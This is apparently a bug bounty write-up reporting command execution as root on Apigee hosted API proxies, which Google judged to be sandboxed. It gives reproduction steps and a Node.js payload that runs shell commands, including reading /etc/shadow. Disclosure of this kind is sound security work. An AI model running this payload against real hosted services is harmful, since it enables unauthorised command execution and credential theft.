WRITE UP: Google VRP N/A – Sandboxed RCE as root on Apigee API proxies


Hi everyone It’s been a while since my last post but I’m back, I want to tell you a very short story about one of my last bugs, and how I managed to get an RCE as Root in Apigee (Google acquisition)

This blogpost appeared first in the book Bug Bounty Write Ups Collection

Extracted from Google VRP’s report: (the actual Google VRP report)

Summary: RCE on Apigee API proxies

Steps to reproduce:

1.- open apigee.com login in with your account

2.- navigate to Develop > API proxies and click “+Proxy” button

3.- select hosted target: – put any name (in this case “rce”) – select “Quick start” radio button and the “Next” button – then “Next” again, and “Next” one more time – – check “prod” checkbox and clic “Create and Deploy” Button – after the deploy, copy the url and clic on “Edit proxy”

4.- select “Develop” tab, then clic the “index.js” file in “Resources > hosted” section, and replace the content of that file with and clic on “Save” and “Save” one more time:

var http = require('http');
const { exec } = require('child_process');
var svr = http.createServer(function(req, resp) {
  resp.setHeader('Content-Type', 'application/json');
    // you can put any linux command in exec function 
    exec('echo "- - - - id - - - -";id; echo ;echo "- cat /etc/shadow - ";cat /etc/shadow' , 
    	(error, stdout, stderr) => {
        	resp.end(stdout + '\npoc by @omespino');
svr.listen(process.env.PORT || 3000, function() {});

5.- then visit the url of your proxy and voalá!, profit RCE as root in that Apigee instance

Nov 27, 2020: Sent the report to Google VRP
Dec 2, 2020: Got a message from google that the bug was triaged (P2)
Dec 15, 2020: Got a message from google “The executed code is correctly sandboxed.”

Well that’s it, share your thoughts, what do you think about how they handle that security issue? If you have any doubt, comments or suggestions just drop me a line here or on Twitter @omespino, read you later.

Leave a Reply

Your email address will not be published.